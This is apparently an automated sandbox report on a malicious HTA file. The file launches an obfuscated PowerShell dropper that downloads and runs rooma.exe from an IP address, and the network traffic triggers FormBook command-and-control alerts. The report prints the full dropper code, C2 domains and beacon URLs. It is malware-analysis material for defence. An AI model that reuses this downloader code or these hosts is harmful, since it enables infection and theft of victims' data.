Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 24, 2024, 9:37 a.m.	May 24, 2024, 9:41 a.m.

Size	9.9KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`409f1bada32d81974fd8606be4cbc943`
SHA256	`44973eb6e87b61951a5244aab9cf1fc9d04d2d97ab9ec6914c56b54f3d3b7743`
CRC32	`75A32742`
ssdeep	`192:QSc8pfJ204eoWujo+tVo1oLfbAJkJ9M5f29:BcgonouoC`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\room4.hta
1460
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
  2104
  - rooma.exe "C:\Users\test22\AppData\Roaming\rooma.exe"
    2308
netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
2424
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2852
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
www.antonio-vivaldi.mobi	A 46.30.213.191	46.30.213.191
www.goldenjade-travel.com	A 116.50.37.244	116.50.37.244
www.3xfootball.com	A 154.215.72.110	154.215.72.110
www.kasegitai.tokyo	A 202.172.28.202	202.172.28.202
www.magmadokum.com	CNAME natroredirect.natrocdn.com CNAME redirect.natrocdn.com A 85.159.66.93	85.159.66.93
www.liangyuen528.com
www.techchains.info	A 66.29.149.46	66.29.149.46
www.rssnewscast.com	A 91.195.240.94	91.195.240.94
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
116.50.37.244	Active	Moloch
154.215.72.110	Active	Moloch
164.124.101.2	Active	Moloch
20.86.128.223	Active	Moloch
202.172.28.202	Active	Moloch
45.33.6.223	Active	Moloch
46.30.213.191	Active	Moloch
66.29.149.46	Active	Moloch
85.159.66.93	Active	Moloch
91.195.240.94	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49171 -> 154.215.72.110:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 91.195.240.94:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49200 -> 66.29.149.46:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 20.86.128.223:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 20.86.128.223:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 20.86.128.223:80 -> 192.168.56.103:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 20.86.128.223:80 -> 192.168.56.103:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 202.172.28.202:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 116.50.37.244:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 46.30.213.191:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 85.159.66.93:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2024, 9:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 24, 2024, 9:37 a.m.			0	0

Command line console output was observed (24 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: At line:1 char:690 console_handle: 0x00000053	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: + function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGc console_handle: 0x0000005f	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: HEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(4712 console_handle: 0x0000006b	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: 5,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.Ends console_handle: 0x00000077	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: With((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -Executi console_handle: 0x00000083	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: onPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47 console_handle: 0x0000008f	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: 125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process console_handle: 0x0000009b	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHR console_handle: 0x000000a7	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: fuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146, console_handle: 0x000000b3	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: 47187,47184,47180,47189,47195));[Net.ServicePointManager]:: <<<< SecurityProtoc console_handle: 0x000000bf	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: ol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.Downloa console_handle: 0x000000cb	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: dData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$ console_handle: 0x000000d7	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$P console_handle: 0x000000e3	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: DFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};fun console_handle: 0x000000ef	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: ction iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + ' console_handle: 0x000000fb	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = console_handle: 0x00000107	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129, console_handle: 0x00000113	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: 180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; console_handle: 0x00000137	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000143	1	1
WriteConsoleW May 24, 2024, 9:37 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000014f	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c0200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2024, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bfc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 24, 2024, 9:37 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://20.86.128.223/room/rooma.exe

Performs some HTTP requests (16 events)

request	GET http://20.86.128.223/room/rooma.exe
request	POST http://www.3xfootball.com/fo8o/
request	GET http://www.3xfootball.com/fo8o/?I0NK=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&Lw8=oat1oSv
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip
request	POST http://www.kasegitai.tokyo/fo8o/
request	GET http://www.kasegitai.tokyo/fo8o/?I0NK=0LNqIGaAWMhMIMLOr1FzuAu+QFTp+Isr9lFre+yu3/9GvRNYi1uHghhDsQ/pqDAQ+wkUrFUIurr7TLyDqzId9vCn3h40hICDSYZjejM1bTxHHnFMxARLyMCZMUhSp6GMEGHL0HI=&Lw8=oat1oSv
request	POST http://www.goldenjade-travel.com/fo8o/
request	GET http://www.goldenjade-travel.com/fo8o/?I0NK=LFKqyrcu7g1NCa8bIVnmntQ0zrEKrQSprIMLtaWgKJ9bBKQr4dsn0J7ZoYUgIJ+R6Sel8OhXEcHhC7LyM9bkgjIIu2U6i6kbe5asCJcEX28JEcHJIWfCjODnuc7OiogdzaMrHf8=&Lw8=oat1oSv
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	GET http://www.antonio-vivaldi.mobi/fo8o/?I0NK=PTl5gU/3CD/Xhg5KAVLGoeqWcilDUK5FTZuVmm6gfrwSjnBrSraU5xyBGUoA1k9xMbAGIU7PLJqf1PTsNd74L3d6+NgzbyGN2pTsiSyIeh1B8hC/nFfIu9UZrk9ku3J39HvVUu8=&Lw8=oat1oSv
request	POST http://www.magmadokum.com/fo8o/
request	GET http://www.magmadokum.com/fo8o/?I0NK=qL3nKp+YSjoaTomnND+fiETGbzpIgkHGMW8DXsDTZ4AADrD7Wpn1kxM1jYW2/C2WhyBblBh5NUSWrO5bZjyCcVkJYbxxq5QITB2h2xAyEikjbcoqZSmDOCeIE8A+B7hyBKIW8mw=&Lw8=oat1oSv
request	POST http://www.rssnewscast.com/fo8o/
request	GET http://www.rssnewscast.com/fo8o/?I0NK=x3jV/ECx7FuzXOI+6CNaISj98UIEn47HyCIVaqWvGMMqpfz0YC5wNp/pxM1zEFNKv4nPeGfT8/lZrDaJmccs4488pD+gaHK32CxgTEs5a2vdBlM4hQBa8nlaMF5vesFSU19kJNk=&Lw8=oat1oSv
request	POST http://www.techchains.info/fo8o/
request	GET http://www.techchains.info/fo8o/?I0NK=vefd0teQh+kbruh+iKW53cdcsQD4oFyRDgCUoL90YCYLczV+Hcc/VZ2eVbboy/u5EgiS3CnxBclKZHyNJ/4ALr08/A/SWk5lVGufGp2P4fG4f3GonqE4cYuaa0/JNC0RZIlRWrU=&Lw8=oat1oSv

Sends data using the HTTP POST Method (7 events)

request	POST http://www.3xfootball.com/fo8o/
request	POST http://www.kasegitai.tokyo/fo8o/
request	POST http://www.goldenjade-travel.com/fo8o/
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	POST http://www.magmadokum.com/fo8o/
request	POST http://www.rssnewscast.com/fo8o/
request	POST http://www.techchains.info/fo8o/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02541000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
